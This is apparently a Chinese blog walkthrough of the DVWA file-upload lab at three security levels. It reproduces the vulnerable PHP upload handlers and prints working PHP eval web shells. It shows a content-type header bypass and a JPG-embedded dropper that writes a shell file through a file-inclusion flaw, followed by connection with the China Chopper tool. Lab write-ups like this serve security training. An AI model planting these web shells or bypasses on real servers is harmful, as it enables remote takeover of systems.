dvwa之File Upload
File Upload之low等级没有任何防护
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// Can we move the file to the upload folder?
if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
// No
$html .= '<pre>Your image was not uploaded.</pre>';
}
else {
// Yes!
$html .= "<pre>{$target_path} succesfully uploaded!</pre>";
}
}
?>
准备好一句话
<?php
@eval($_POST['ma']);
echo "666666";//做个标识
?>
直接上传muma.php
已被解析
上菜刀
好了
File Upload之medium等级
检测content-type需要为image/jpeg 或者 image/png
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// File information
$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
$uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
$uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
// Is it an image?
if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
( $uploaded_size < 100000 ) ) {
// Can we move the file to the upload folder?
if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
// No
$html .= '<pre>Your image was not uploaded.</pre>';
}
else {
// Yes!
$html .= "<pre>{$target_path} succesfully uploaded!</pre>";
}
}
else {
// Invalid file
$html .= '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
}
}
?>
准备好一句话
<?php
@eval($_POST['ma2']);
echo "7777777";//做个标识
?>
修改为Content-Type: image/jpeg,上传成功
被解析了
上菜刀
File Upload之high等级
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
$html .=$_FILES['uploaded']['name'];
$html .=basename($_FILES['uploaded']['name']);
// File information
$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
$uploaded_ext = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
$html .="itis".$uploaded_ext;
$uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
$html .=$uploaded_size;
$uploaded_tmp = $_FILES[ 'uploaded' ][ 'tmp_name' ];
// Is it an image?
if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
( $uploaded_size < 100000 ) &&
getimagesize( $uploaded_tmp ) ) {
// Can we move the file to the upload folder?
if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
// No
$html .= '<pre>Your image was not uploaded.</pre>';
}
else {
// Yes!
$html .= "<pre>{$target_path} succesfully uploaded!</pre>";
}
}
else {
// Invalid file
$html .= '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
}
}
?>
strrpos() 函数查找字符串在另一字符串中最后一次出现的位置。
strrpos() 函数对大小写敏感。在这里也就是匹配 . 最后一次出现的位置,然后使用**substr()**截取.后面的字符串,也就是文件后缀
getimagesize() 函数将测定任何 GIF,JPG,PNG,SWF,SWC,PSD,TIFF,BMP,IFF,JP2,JPX,JB2,JPC,XBM 或 WBMP 图像文件的大小并返回图像的尺寸以及文件类型及图片高度与宽度。如果不是真的图片 就是FALSE了
因此 high等级只能老老实实上传图片了,配合文件包含漏洞才能成功利用
准备好writephpmuma.php和一张图片 121212.jpg
66677777
其中writephpuma.php内容如下,功能是创建一个php文件 并写入一句话木马,其中一句话木马的密码是mima
<?php
$mima='jpgma';
touch ("testshell.php");
$file = fopen("testshell.php","w");
$write='<?php @eval($_POST['.$mima.']); ?>';
echo fwrite($file,$write);
fclose($file);
?>
把writephpmuma.php藏到图片121212.jpg里,生成writephpmuma.jpg
查看一下writephpmuma.jpg,已经写进去了
上传writephpmuma.jpg
访问一下
使用文件包含去包含上传的writephpmuma.jpg(会被当作php解析),这里得在php.ini文件中设置允许远程文件包含allow_url_include=On
在文件包含的目录下生成了一句话木马testshell.php
生成的testshell.php内容如下
访问一下,被解析了
上菜刀
dvwa之文件上传 结束